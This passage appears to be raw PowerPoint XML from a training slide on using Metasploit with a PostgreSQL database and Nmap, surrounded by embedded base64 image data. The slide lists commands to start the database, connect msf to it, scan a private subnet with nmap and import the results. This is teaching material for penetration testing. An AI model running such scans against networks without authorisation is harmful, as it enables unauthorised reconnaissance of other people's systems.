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2198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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; Databases &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nmap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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200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Database Support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Supports MySQL and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/postgresql-8.4 start (starts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PostgeSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db_connect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	postgres:password@127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	(connects to database server and creates database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So What?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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.0.0/24 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> subnet1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db_import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> subnet1.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQPEBQPDxAUFBQPEBQQDxUVFRcPFBAQFRgZFBQVFBQXHCgeGBklGhQUIC8gIycpLS0tFR4yNTArNSYrLSkBCQoKDAwOFA4PFDUkHiM1NSkwLSk1LDUuNSw1KTUpNTU2KSs1KSk1Ly8pNTUpKjUpKSstNiw1LCkrNS4sLDIpNf/AABEIALAA6wMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAACAECBQYHAwT/xABMEAABAwICBQULCAgDCQAAAAABAAIDBBEFEgYHITFxEyJBdLMINDVRYXJzgZGxshQXIyUyM1XSFVJTYnWSoeFCQ/BERVRjgqLC0eP/xAAYAQEAAwEAAAAAAAAAAAAAAAAAAQUGBP/EACYRAQAABAUEAgMAAAAAAAAAAAABBAYRQkSBgsECAxITBTEhQVH/2gAMAwEAAhEDEQA/AO4oQhAIQhAIQhAIQhBCpLuV1WTceCgcv+ea/wDsW8ft/wD5LqLdyWNnRwCZ0Ljle719zy8otN8/8fLSfp9HTa97/mMfq39uFKhSu1mQhCEAhCEAhCEAhCEAhCEAoJUrzmbcEA22GxG8bN4QXzKMy1DCYJHVNYx1XUFtJLE2IF7Tma+lY5wdzdvOeXX8dujYsJV6UVAwqaPlyK2lhD5JbDM6HI2WOYNItzw5rN32g8b2oOl3UrzjFha/9/7r0QCEIQCEIQCEIQCEIQQqybjwVlWTceCiKSyN6PUmdCWJvRwCZ0KukcWjZ1Xl93AUqFKsmLCEIQCEIQCEIQCEIQCEIQCiylCD4Y8Gia6V7WWdU25c5nc+zcgvt2c0AbLbl5TaN0743QuhaWPiZA8XIL4Y75GOcDctGZ2wn/EVk0IKtZbZ/dWQhAIQhAIQoQShVDlhcS02oaUls9bAxzftNMjS8cWAkj2IM4hai3WxhZIH6Qi2+eP6lqzmG6R01VspqmGUgXIjkbIQPKAbhBkVWTceCsFWTceCiKSyN6OATOhLE3o4BM6FXSOLRs6qy+7gKVBUZlZMWshVui6CyFW6C5BZCgFCCUKuZF0FkKpcpBQShQVGZBZCrdTdBKEIQCEIQQtc0106p8Jh5Woddz7iGJts8rh4vEBsu47Bf1L7dKdI4sOpZKuc82JuwDfI87GMb5SdiUzSfSWbEql9VUOu555ovsjZ/hYwdDR/7PSgzmmGtatxIlrpTDCTshiJY2377vtPPHZ5AtLuhCAut+1G+G4PMm7Ny0Fb/qM8NweZN2bkDRBVk3HgrBVk3HgoiksjejgEzoSxN6OATOhV0ji0bOqsvu4eNZ92/wAx3uKSUlO3V/dv8x3uKSMqyYsXRdCLIC66j3PB+tX9Uk+Ji5cuodzx4Vf1ST4mIGRCCgIQcf7pDvOl6y7syl+zJgu6R7zpesu7MpfEGe0FP1pQ/wAQpej/AJzE4jQk70E8KUH8Qpe2YnECDHaSd51HVpuzckwJToaR951HVpuzckuKCQ5Nlqm8C0XoT8bkpgTZ6pvAtF6E/G5Bt6EIQCq5WVXIF87oPS